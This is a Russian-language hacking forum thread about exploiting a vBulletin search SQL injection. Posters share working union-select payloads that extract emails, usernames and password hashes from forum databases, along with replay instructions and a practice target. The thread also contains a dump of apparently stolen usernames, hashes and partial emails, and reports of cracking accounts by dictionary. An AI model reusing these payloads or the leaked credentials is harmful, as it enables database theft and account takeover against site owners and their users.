есть какието символы которые неиспользуются в соли ?
просто можна было бы сменить разделитель на этот символ )
комунибуть такое попадалось ?
Цитата:
sakura:0xf1261015e8b34b333fbdb78f4375ef08::[Ссылки могут видеть только зарегистрированные пользователи. ]
manz007:0xa7face3e6e06fd71f98e9c143e1d42e7::manz_j [Ссылки могут видеть только зарегистрированные пользователи. ]
manz_007:0xa0f02beb07c7e5e852af716d18b41abb::manz_ [Ссылки могут видеть только зарегистрированные пользователи. ]
katak789:0x3a2ea443ebbdc80553d50615fc5f7333::alria [Ссылки могут видеть только зарегистрированные пользователи. ]
wanam123:0x409843c42519b37a232883db4d0e1660::wanam [Ссылки могут видеть только зарегистрированные пользователи. ]
castle3:0x20b2317fb7b5eb051681aa518551b15c::anyloh @yahoo.com.sg
castle4:0x4a111eb3de49620c6871a54f7a8f19f9::anyloh @yahoo.com.sg
triedge:0x528eb3a3873318d88c0c132f6608711b::riezer [Ссылки могут видеть только зарегистрированные пользователи. ]
mofumofu:0xec78ad29a5886aff0f963b469634dfe5::merid [Ссылки могут видеть только зарегистрированные пользователи. ]
srdejoker:0xd15bb78421e149879e6cd9dedbfb7de5::ange [Ссылки могут видеть только зарегистрированные пользователи. ]
pager82:0xce6f5dc249b3ea1e2e6a1811c6e28e91::agus@y ahoo.com
fajar06:0xb7fed1969b65507ad21a2c7c3f32ca40::riyyuk [Ссылки могут видеть только зарегистрированные пользователи. ]
соли нет вообще, хеш смахивает на хекс, удалил 0х попробовал как мд5 из 10к ток 20 акков розшифровало по словарям )
кстати мож кому нужно
это запрос на мыло
Цитата:
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select email from user where userid=1 and row(1,1)>(select count(*),concat( (select user.email) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
это запрос на юзернейм
Цитата:
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select username from user where userid=1 and row(1,1)>(select count(*),concat( (select user.username) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Последний раз редактировалось SyavaK; 28.09.2011 в 12:14.
у меня всё без пробелов , это сам форум вставляет пробелы если слово длинное какнить попробуй , выше я написал 60 нулей без пробелов
с солью розобрался пасворд про делил соль, у мнея (3.1.1.0)
поменял разделитель : на № такой знак в соли пока не встречался
Последний раз редактировалось SyavaK; 29.09.2011 в 11:09.
думаю таблица есть полюбому просто по другому называется
и тут нужно вписать правильное название таблицы from user
владелец сайта может назвать таблицу как хочет, просто большинство оставляют по умолчанию
скорей всего и тут нужно будет изменить concat( (select user.password)
Последний раз редактировалось SyavaK; 30.09.2011 в 14:57.
если найдёш плагин к своему браузеру который сможет подменить запросы то можно
когдато тоже было задумался над этим )
в итоге просто скачал портабл версию мозилы )
Добавлено через 7 часов 10 минут
ещё одна загадка
нашёл 1 форум с этой уязвимостью
сливаю базу
хеш норм
а соль вида "pandamad1824505432"
"pandamad9476239054"
и тд слово пандамад и 10 цыфр
ктонить с таким сталкивался ? это соль ?
Последний раз редактировалось SyavaK; 30.09.2011 в 22:56.
Причина: Добавлено сообщение
ищем POST запрос, он будет первый...
жмете на него и Повтор
нашел, нажал.
Цитата:
редактируете его так, чтобы у вас остался только
securitytoken
....
....
....
должно быть так
Код:
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?
редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?
если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш
если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска
вот уязвимый форум можеш потренироватся
[Ссылки могут видеть только зарегистрированные пользователи. ]
P.S. Люди в тюрьмах столько не сидят,сколько вы за компьютером
может стоит написать МЫ ))
Последний раз редактировалось SyavaK; 01.10.2011 в 14:30.
если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш
если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска
вот уязвимый форум можеш потренироватся
[Ссылки могут видеть только зарегистрированные пользователи. ]
Вряд ли, использую ссылки которые указал автор темы: